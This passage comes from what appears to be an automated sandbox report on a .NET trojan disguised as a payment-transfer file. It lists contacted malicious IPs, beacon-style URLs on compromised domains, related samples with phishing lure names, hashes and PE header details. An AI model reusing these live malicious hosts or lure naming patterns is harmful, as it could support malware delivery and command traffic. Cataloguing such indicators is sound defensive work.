                                                          http://www.sweetpopntreatz.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.kanaai.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.long9000.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.olgadalila.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jaemagreci.com/blr/www.sweetpopntreatz.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.stanchilo.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            210.152.86.132
                                                            unknownJapan4694IDCFIDCFrontierIncJPtrue
                                                            198.52.105.123
                                                            unknownUnited States
                                                            35916MULTA-ASN1UStrue
                                                            50.116.112.43
                                                            unknownUnited States
                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                            176.74.27.137
                                                            unknownUnited Kingdom
                                                            38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                                                            35.246.6.109
                                                            unknownUnited States
                                                            15169GOOGLEUStrue
                                                            34.102.136.180
                                                            unknownUnited States
                                                            15169GOOGLEUStrue
                                                            185.199.108.153
                                                            unknownNetherlands
                                                            54113FASTLYUStrue
                                                            164.155.144.220
                                                            unknownSouth Africa
                                                            26484IKGUL-26484UStrue
                                                            198.27.88.111
                                                            unknownCanada
                                                            16276OVHFRtrue

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Emerald
                                                            Analysis ID:356535
                                                            Start date:23.02.2021
                                                            Start time:09:45:52
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 49s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:36
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:1
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@7/1@9/9
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 65.3% (good quality ratio 60%)
                                                            • Quality average: 71.9%
                                                            • Quality standard deviation: 31.2%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            • Override analysis time to 240s for sample files taking high CPU consumption
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 92.122.145.220, 168.61.161.212, 184.30.20.56, 51.104.139.180, 104.42.151.234, 8.248.139.254, 8.248.131.254, 67.27.157.254, 67.27.157.126, 8.248.147.254, 20.54.26.129, 51.104.144.132, 92.122.213.247, 92.122.213.194, 52.155.217.156
                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            09:46:53API Interceptor1x Sleep call for process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            35.246.6.109Order_20180218001.exeGet hashmaliciousBrowse
                                                            • www.pamsinteriors.com/seon/?EJBpf8l=BeyjuOpWFnXPmJwCXss3Kf1c/WkomheBvhalLCEmx4oBhDIsdeYLlupEzXnVn3Elg/0a&kDKHiZ=QFNTw2k
                                                            ORDER LIST.xlsxGet hashmaliciousBrowse
                                                            • www.equiposddl.com/4qdc/?jpaha=seo4KtASU38iE1JxvFjoxqkgDldoxUIk7lgrfGyblEtLt+g6uaUe1PngqhTXQae7QGmK3w==&3fz=fxopBn3xezt4N4a0
                                                            PO_210222.exeGet hashmaliciousBrowse
                                                            • www.deepdewood.com/dka/?9rYD4D2P=8Eq/i2VOsbL+cvGSr7jtksOkLx2JSoJy2W2Vokw4XdtvBNdBMtYC7BHfOEJyNL5XOcwi&4h=vTxdADNprBU8ur
                                                            c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                            • www.cpnpproductions.com/ivay/?Lh0l=ZTdp62D8T&oPnpM4=vFzBmzYkSE6NJX5Oi9qDw7LP1Ie3GejevhUpCGfEyuF65umwf1lNU0clWPDg340Y/N7A
                                                            DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                            • www.diamondmobiledetailingmo.com/cna8/?kRjH3=D+j2eq9KshChsJfpYDP3dQ9JuFiLgHAjcH9HGbD94qE8IOb1eA4vp6C2dFUUzy2K5Yw6&0pn=WHuxqns0PJ
                                                            PO copy.pdf.exeGet hashmaliciousBrowse
                                                            • www.420cardsaz.com/mnf/?LZQd=c2FGkgrIiHx6A+YpbujIX/pRBzHucA6uVD2Iv2lwjcDMA3YdIOl90NbZkzPWKwdpkhTknLLKkw==&t6Ah=nvyxGvvP2N
                                                            swift copy pdf.exeGet hashmaliciousBrowse
                                                            • www.tryangel.store/bft/?_XALWr=jpmZLTSyBz2jdeueRsJVQUmFJk6s6P71pSFOa9DJ8TNzBfJyqx0h1w7Hy/WvHYDE5ViT&qL3=gdnLM6Jh-D
                                                            Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
                                                            • www.simsprotectionagency.com/h3qo/?t81X=MvZTWvl&CXaDp=fazjW/7YGCwLRHgRC8KmkP4D5qa6jsntndFx6UhabFksSDw+qabl0OCgPeILzj01MKkl
                                                            VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                            • www.inventorengenharia.com/rgc/
                                                            PO-3170012466.exeGet hashmaliciousBrowse
                                                            • www.belaronconsulting.com/bbk4/?tXi0=MXbP9&h0DhlHu=+EJRPCvoSUIWohgRtjoT+h+aJKJwz5L2awFUgvDh2tnrIXiNEBO46ihyAAukMj+gwlvj
                                                            Docs.exeGet hashmaliciousBrowse
                                                            • www.jobjori.com/mph/?2d8=uwes4NAAGJvbvTNDrnMSQtTrpf+STMgR9GkF363pIG/8747PqaoTfG32WzLUsEUtFvfI&BXnXAP=YrhH0RRxT8EL1Dl0
                                                            evc421551.exeGet hashmaliciousBrowse
                                                            • www.germbusterfl.com/yce/?EDKHEJ4=YvBIwtBNBxVWDZ3mSpdVPoUVjRg4HWVmbSak5PPFjoPFoBviop4cOcqLl6Bc6yfYKIGR&FhL=E2M4YLC06Jl
                                                            3434355455453456789998765.exeGet hashmaliciousBrowse
                                                            • www.fullspeedautomation.com/mlc/?YBZpb4BH=cKajpmj9ZvLEOZObpTfg1vSv7WANvvvZPHvLzMejPL5eBn3vSNfBC5rt5/2jiF+IxeM5&op=3f5H00mHa
                                                            ships documents.xlsxGet hashmaliciousBrowse
                                                            • www.enlightenedsoil.com/gqx2/?Czud=Dpp83ZapOz0DiPO&-Z7tZ=cjip6uuI9bZoUAnV+V+JPH7D0kYGWUsT6+5UMJSQ9+x3pL2tU/1BL1F+whUGJDO+/8leww==
                                                            NsNu725j8o.exeGet hashmaliciousBrowse
                                                            • www.thepoetrictedstudio.com/bw82/?qFN4JPfH=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHK6M8xRYK4Gq&8p4=fjlP_N-pFZH4xV
                                                            ki7710921.exeGet hashmaliciousBrowse
                                                            • www.lukebaileydesigns.com/yce/?_FNl7h=BJjaWCSLcmhpwMCAbMgCEpA4KPsKmpI27R00KPA/4hm7M2Dmte16C6Vr3UX3AsCkXC07&qL3=g8nP-lQxEti
                                                            YK5tmqQ18z.exeGet hashmaliciousBrowse
                                                            • www.oilspilladjustersettlement.com/i032/
                                                            lbqFKoALqe.exeGet hashmaliciousBrowse
                                                            • www.1819apparel.com/csv8/?8pHXLLhp=XtNGIsK9NyfrmSyC60HBpItz0Umgq62yD1Tk73refEWRTM8pCZ2m1g8hKfyJT1do49NQ&hbs=CnehJPdp6XLP_rwP
                                                            6tivtkKtQx.exeGet hashmaliciousBrowse
                                                            • www.kindredkitchencatering.com/c8so/?BZL0RN=nQgjEQkVGYPM5UKeXNK2AnUvs9ry6NBQS/Ek/mciAV4zwBvL6PrZKUQFTVM5+2/gn+KNxiHJIQ==&3fPHK=w8O8gTXxNJq
                                                            bgJPIZIYby.exeGet hashmaliciousBrowse
                                                            • www.thepoetrictedstudio.com/bw82/?GFND=RsrdfQA5mS60+WzVQF//8cbwzrXLIF3fF+o+nHpDVSzwZDE8R2fNyvkoHJa2sgxgQfnt&Rlj=YVIX8Hyx
                                                            34.102.136.180lpdKSOB78u.exeGet hashmaliciousBrowse
                                                            • www.havemercyinc.net/4qdc/?sxlpdB=o1YYd6Gi2K67gelLAX14ago2MHBzIaWFdtb1Ca8ijRLt6mEmIsAV47qF7pv8e7ASo7Rk&2dz=onbha
                                                            vBugmobiJh.exeGet hashmaliciousBrowse
                                                            • www.activagebenefits.net/bw82/?L6Ah=2dPLKjuxNzghip&2dspCJ=kkzs7wdk+a5EmvlejfiLHnYXY/z1ZZpbk/A0waQQyoH3vrpc5BJXUH7YClYSBXJaDwsI
                                                            ORDER SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                            • www.softwaresreports.info/owws/?FZA=5jCx8TJ67BDPxitFKTiPzVbAv5V4WmfLvz0iUotKb81cdHhoP6D4U31cAoF9J0eWw3xa&GzrX=Bxo0src
                                                            NewOrder.xlsmGet hashmaliciousBrowse
                                                            • www.covidwatcharizona.com/tub0/?azuxWju=dEK3j7mWBeQXl2zlSZSqDcFEW4EdlZEYoS0+mEVRU2HuA7A7T/ky1yECx94kGVXSwos3qg==&0dt=YtdhwPcHS
                                                            Order_20180218001.exeGet hashmaliciousBrowse
                                                            • www.houstoncouplesexpert.com/seon/?EJBpf8l=ojsb3jKq/XKh64QU9jx/ITCiT4+67gOjnvEpe+kxWJrzMHvdGcv1c3rSoEz5gk4FhTBQ&kDKHiZ=QFNTw2k
                                                            22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                            • www.rizrvd.com/bw82/?RFQx_=AJ+QNFfsTFGsedRB1oQHABBFVni950JEMBOKAlzmtW9JOrHkbqbPAoxgnlDKI2ECKqRl+w==&GZopM=kvuD_XrpiP
                                                            ORDER LIST.xlsxGet hashmaliciousBrowse
                                                            • www.speedysnacksbox.com/4qdc/?jpaha=oetlJbtkpt9RC07gzGtc819EDOSw/wKhNDKeGQ7agYbSWM8ZAAA074MmVo5ceZhU2bos5Q==&3fz=fxopBn3xezt4N4a0
                                                            PO_210222.exeGet hashmaliciousBrowse
                                                            • www.kspindustries.com/dka/?9rYD4D2P=9WUKE20VMOTsgTPOGG+gM7wMKgTDQQYKjBu36Jx5uNlLi85Jvnz4VQqFTS3DYsDMhKcM&4h=vTxdADNprBU8ur
                                                            Order83930.exeGet hashmaliciousBrowse
                                                            • www.worksmade.com/pkfa/?kRm0q=AeLHm4krJ5cZleWXJ7DbkRDB3iMf+mbqkQIEvPdjRXBov8eOMTfw1ykaYqt0P2yYW1wd&P0D=AdpLplk
                                                            DHL eInvoice_Pdf.exeGet hashmaliciousBrowse
                                                            • www.lovethybodi.com/dll/?Ezrt7H=XrITfbQx&rJET96=VZxax5Ji0ayI+hrvRc8xbN6ADZocsLe3YiHwLknRP/O6fJJXAg3ZXgaLGnTQhcDUXCIi
                                                            AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                                                            • www.sioosi.com/idir/?jFNhC=BAdMNhCaU+7u9XJaCO3iV4C5aA0TCLj07dpBj0L8TrCXQaq7x7/wZRF1tJRJ0mfI3EQomiZFcg==&PlHT0=_6g89p5H3xehg
                                                            rad875FE.tmp.exeGet hashmaliciousBrowse
                                                            • fdmail85.club/serverstat315/
                                                            SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                            • www.buyers-connection.com/mt6e/?T8e0dp=hLmMffsGgwjrW5RZdYCH6mddSm2W9hJJfHEwGoyKmHJo5/xZlUyZeqeg++L426DpjyYm&Fx=3fdx_dt
                                                            DHL Document. PDF.exeGet hashmaliciousBrowse
                                                            • www.thebrowbandit.info/d8ak/?Szr0s4=zH7+TMUEa66ds4LUG5QkV+A8HFZNfwJlYCtch+3uZ/cbqgmlMO3qxYa4o/rgt+cFNwefcp2wvw==&QL3=uTyTqJdh5XE07
                                                            eInvoice.exeGet hashmaliciousBrowse
                                                            • www.cyberxchange.net/dll/?alI=J6AlYtFHR6r&DxlLi=O16Cpvehw381JgOcsiBVvt6SNBXVOB+15MfeRQ6rIhocO090ZFQOuEsCZWtNgYTmelCy
                                                            IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                            • www.beasley.digital/gypo/?UrjPuprX=M7Hk14MLzXe1S9acHT7ZsieFPBYG9bGpGcbZ4ICPUuDVYKBFzTViR4JE6d+ne5phLrjWAg==&nnLx=UBZp3XKPefjxdB
                                                            Outstanding Invoices.pdf.exeGet hashmaliciousBrowse
                                                            • www.arescsg.com/ocq1/?Bl=lHLLrF4h72F&ITrHi2v=QNjT++wY9a5zCVAjoE7Ie93o6MHPk5lGE/qlj9tP3aNbcRLbl33t+j0E2POpmVTB9EfC
                                                            PDF.exeGet hashmaliciousBrowse
                                                            • www.sevendeepsleep.com/ujg4/?Ktz4q=vVYHGFhESmr0MhafV2r1epXRiWHZKHpqHzgNJrSdHWrYUNDGZWFgSG6u51EUVnN8n2QK&tTrL=ApdhXrS
                                                            quotation10204168.dox.xlsxGet hashmaliciousBrowse
                                                            • www.scanourworld.com/nsag/?ixlp=RjpY/w7V4Gns1L0rMkaS4a7cxyPO11vhmKSgl8HqKcRxVLLhONg71u8j186CVYVfR9NOyw==&3f=7nD434
                                                            (G0170-PF3F-20-0260)2T.exeGet hashmaliciousBrowse
                                                            • www.midnightblueinc.com/2kf/?-ZotnB1=PuGWiF25ErpS8LxGcVT732T32YJ8ljB4Nen33bTYqCA1w1k4pKKXZiLEs+9S++zZpoCcFtK2bw==&2d=oneDfP

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            td-balancer-euw2-6-109.wixdns.netOrder_20180218001.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            ORDER LIST.xlsxGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            PO_210222.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            SecuriteInfo.com.Trojan.Inject4.6572.17143.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            c4p1vG05Z8.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            DHL Shipment Notification 7465649870.pdf.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            DHL Shipment Notification 7465649870.docGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            PO copy.pdf.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            swift copy pdf.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            Shipping Document PL&BL Draft (1).exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            VgO6Tbd7Rx.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            PO-3170012466.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            Docs.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            evc421551.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            3434355455453456789998765.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            ships documents.xlsxGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            NsNu725j8o.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            ki7710921.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            YK5tmqQ18z.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109
                                                            lbqFKoALqe.exeGet hashmaliciousBrowse
                                                            • 35.246.6.109

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            MULTA-ASN1USRdLlHaxEKP.exeGet hashmaliciousBrowse
                                                            • 173.82.229.126
                                                            CMahQwuvAE.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            Vghj5O8TF2rYH85.exeGet hashmaliciousBrowse
                                                            • 198.211.22.68
                                                            hkcmd.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            DNSmonitor.x86Get hashmaliciousBrowse
                                                            • 198.211.10.10
                                                            Agreement.xlsxGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            hmH9ZhBQFD.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            Signatures Required 21-01-2021.xlsxGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            fl3TkfT33S.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            2021 DOCS.xlsxGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            RE SHIPPING DOCS MNL 1X20GP+1X40HC ETD27012021pdf.exeGet hashmaliciousBrowse
                                                            • 72.44.77.80
                                                            xwE6WlNHu1.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            PO_JAN907#092941_BARYSLpdf.exeGet hashmaliciousBrowse
                                                            • 72.44.77.80
                                                            TIGW1Ow1O6.exeGet hashmaliciousBrowse
                                                            • 64.69.43.237
                                                            F9FX9EoKDL.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            NEW ORDER 15DEC.xlsxGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            Purchase Order#12202011.exeGet hashmaliciousBrowse
                                                            • 96.45.164.251
                                                            ShippingDoc12-08.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            at3nJkOFqF.exeGet hashmaliciousBrowse
                                                            • 66.152.187.17
                                                            Shipment Document BL,INV And Packing List Attached.exeGet hashmaliciousBrowse
                                                            • 198.74.106.231
                                                            IDCFIDCFrontierIncJPwEcncyxrEeGet hashmaliciousBrowse
                                                            • 202.230.13.241
                                                            Xy4f5rcxOm.dllGet hashmaliciousBrowse
                                                            • 164.46.102.68
                                                            990109.exeGet hashmaliciousBrowse
                                                            • 210.140.73.39
                                                            https://performoverlyrefinedapplication.icu/CizCEYfXXsFZDea6dskVLfEdY6BHDc59rTngFTpi7WA?clck=d1b1d4dc-5066-446f-b596-331832cbbdd0&sid=l84343Get hashmaliciousBrowse
                                                            • 202.241.208.4
                                                            http://perpetual.veteran.az/673616c6c792e64756e6e654070657270657475616c2e636f6d2e6175Get hashmaliciousBrowse
                                                            • 202.241.208.56
                                                            SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exeGet hashmaliciousBrowse
                                                            • 210.152.124.48
                                                            SecuriteInfo.com.Trojan.DownLoader7.37706.14895.exeGet hashmaliciousBrowse
                                                            • 210.152.124.48
                                                            qkN4OZWFG6.exeGet hashmaliciousBrowse
                                                            • 202.230.201.31
                                                            kvdYhqN3Nh.exeGet hashmaliciousBrowse
                                                            • 210.140.73.39
                                                            https://wolusozai.web.app/yuniri-%E9%AB%98%E9%BD%A2%E8%80%85-%E7%84%A1%E6%96%99%E3%82%A4%E3%83%A9%E3%82%B9%E3%83%88.htmlGet hashmaliciousBrowse
                                                            • 210.129.190.174
                                                            3yhnaDfaxn.exeGet hashmaliciousBrowse
                                                            • 210.140.73.39
                                                            https://nursing-theory.org/theories-and-models/holistic-nursing.phpGet hashmaliciousBrowse
                                                            • 202.241.208.55
                                                            http://lapolicegear.com/?msclkid=bff2b1b585fd11812fcaee88d4e2dc4d&utm_source=bing&utm_medium=cpc&utm_campaign=ECI%20-%20LA%20Police%20Gear%20-%20Branded&utm_term=lapg%20gear&utm_content=LAPG%20BrandedGet hashmaliciousBrowse
                                                            • 202.241.208.100
                                                            http://www.fujikura-control.comGet hashmaliciousBrowse
                                                            • 210.140.44.93
                                                            http://scamcharge.comGet hashmaliciousBrowse
                                                            • 202.241.208.55

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log
                                                            Process:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1314
                                                            Entropy (8bit):5.350128552078965
                                                            Encrypted:false
                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.417043661042723
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            File size:716288
                                                            MD5:5f1c9c4a7bc24c3d39a5a3834ba7bb8e
                                                            SHA1:0e9a21a75675c636438f50d90bb5f7ec9a689275
                                                            SHA256:5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
                                                            SHA512:a85b3076ee72e71532e60d84e6827b6c83ddaa2b1f0b287fac373eff495f67600a4e8d47459c6253538f0d9d770c004f41833e75d630d12047442ed3a9033894
                                                            SSDEEP:12288:IQ4DA80ZwvXdU9aLBdf3INYI1r1VJjRXRePHp:8DUZ22ODklZRYPHp
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F4`..............P......H........... ........@.. .......................`............@................................

                                                            File Icon

                                                            Icon Hash:020b05151c020900

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x47c38a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x60344694 [Tue Feb 23 00:04:36 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
